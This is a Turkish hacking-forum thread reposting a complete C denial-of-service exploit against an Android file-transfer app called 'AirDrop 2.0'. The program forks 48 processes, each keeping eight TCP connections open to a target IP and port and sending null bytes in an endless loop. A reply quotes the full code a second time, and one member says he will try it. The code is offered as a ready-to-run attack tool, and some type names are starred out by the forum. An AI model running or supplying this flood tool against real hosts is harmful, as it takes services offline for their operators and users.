İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

AirDrop 2.0 Remote Denial of Service (DoS)

21-02-2019 19:28
#1
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
// Exploit Title/Exploit Başlığı: AirDrop 2.0 Remote Denial of Service (DoS)
// Date/Tarih: 2019-02-21
// Exploit Author/Exploit Yazarı: Marcelo Vázquez (aka s4vitar)
// Vendor Homepage/Yapımcı Web Sitesi: https://support.apple.com/en-us/HT204144
// Software Link/Yazılım Linki: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer
// Version/Versiyon: <= AirDrop 2.0
// Tested on/Test Edilen Sistem: Android

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>


int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;

memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

**** broke(int s) {
// Nothing to do
}

#define CONNECTIONS 8
#define THREADS 48

**** attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
}
}
usleep(300000);
}
}

int main(int argc, char **argv) {

int x;

if (argc < 3) {
printf("Usage: ./AirDrop_DoS <ip-address> <port>\n");
exit(-1);
}

for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}





Exploit Linki : https://www.exploit-db.com/exploits/46445
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

Konu BAGAY tarafından (21-02-2019 19:34 Saat 19:34 ) değiştirilmiştir.

21-02-2019 19:35
#2
Üyelik tarihi:
01/2019
Nereden:
#Space#
Mesajlar:
1.386
Teşekkür (Etti):
73
Teşekkür (Aldı):
325
Konular:
80
Bu Dos Saldırı yapma programı mı hocam?
Kullanıcı İmzası
Aşk güzeldir karşılığı varsa ama karşılıksız da sevilir karşımdaki vatansa...

#Ghost Killer#
21-02-2019 19:38
#3
BAGAY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
127.0.0.1
Yaş:
20
Mesajlar:
654
Teşekkür (Etti):
56
Teşekkür (Aldı):
120
Konular:
45
Alıntı:
Ghost Killer´isimli üyeden Alıntı Mesajı göster
Bu Dos Saldırı yapma programı mı hocam?
Belirtilen program ve versiyonu için geçerli Dos exploiti diyebiliriz.
Kullanıcı İmzası
NE MUTLU TÜRK'ÜM DİYENE

21-02-2019 19:39
#4
Üyelik tarihi:
01/2019
Nereden:
#Space#
Mesajlar:
1.386
Teşekkür (Etti):
73
Teşekkür (Aldı):
325
Konular:
80
Alıntı:
BAGAY´isimli üyeden Alıntı Mesajı göster
Belirtilen program ve versiyonu için geçerli Dos exploiti diyebiliriz.
Anladım hocam sağolun, deneyeceğim.
Kullanıcı İmzası
Aşk güzeldir karşılığı varsa ama karşılıksız da sevilir karşımdaki vatansa...

#Ghost Killer#
21-02-2019 19:41
#5
xMit - ait Kullanıcı Resmi (Avatar)
Root@xMit:~#
Üyelik tarihi:
03/2016
Mesajlar:
1.345
Teşekkür (Etti):
94
Teşekkür (Aldı):
512
Konular:
94
Alıntı:
BAGAY´isimli üyeden Alıntı Mesajı göster
// Exploit Title/Exploit Başlığı: AirDrop 2.0 Remote Denial of Service (DoS)
// Date/Tarih: 2019-02-21
// Exploit Author/Exploit Yazarı: Marcelo Vázquez (aka s4vitar)
// Vendor Homepage/Yapımcı Web Sitesi: https://support.apple.com/en-us/HT204144
// Software Link/Yazılım Linki: https://apkpure.com/airdrop-wifi-file-transfer/com.airdrop.airdroid.shareit.xender.filetransfer
// Version/Versiyon: <= AirDrop 2.0
// Tested on/Test Edilen Sistem: Android

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>


int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;

memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

**** broke(int s) {
// Nothing to do
}

#define CONNECTIONS 8
#define THREADS 48

**** attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
}
}
usleep(300000);
}
}

int main(int argc, char **argv) {

int x;

if (argc < 3) {
printf("Usage: ./AirDrop_DoS <ip-address> <port>\n");
exit(-1);
}

for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}





Exploit Linki : https://www.exploit-db.com/exploits/46445



Bi kaç konuna bakmıştım Anlayanlar kendilerine rahatlıkla pay çıkartabilir deneme fırsatları olabilir fakat genel kesime hitap etmek istiyorsan biraz daha genel hatlarını ortaya çıkartmalısın konuların
Kullanıcı İmzası
✎ ... TurkHackTeam.org/net








-CYBER ​​ATTACK ARTS-
Konu Qwx tarafından (25-02-2019 22:53 Saat 22:53 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı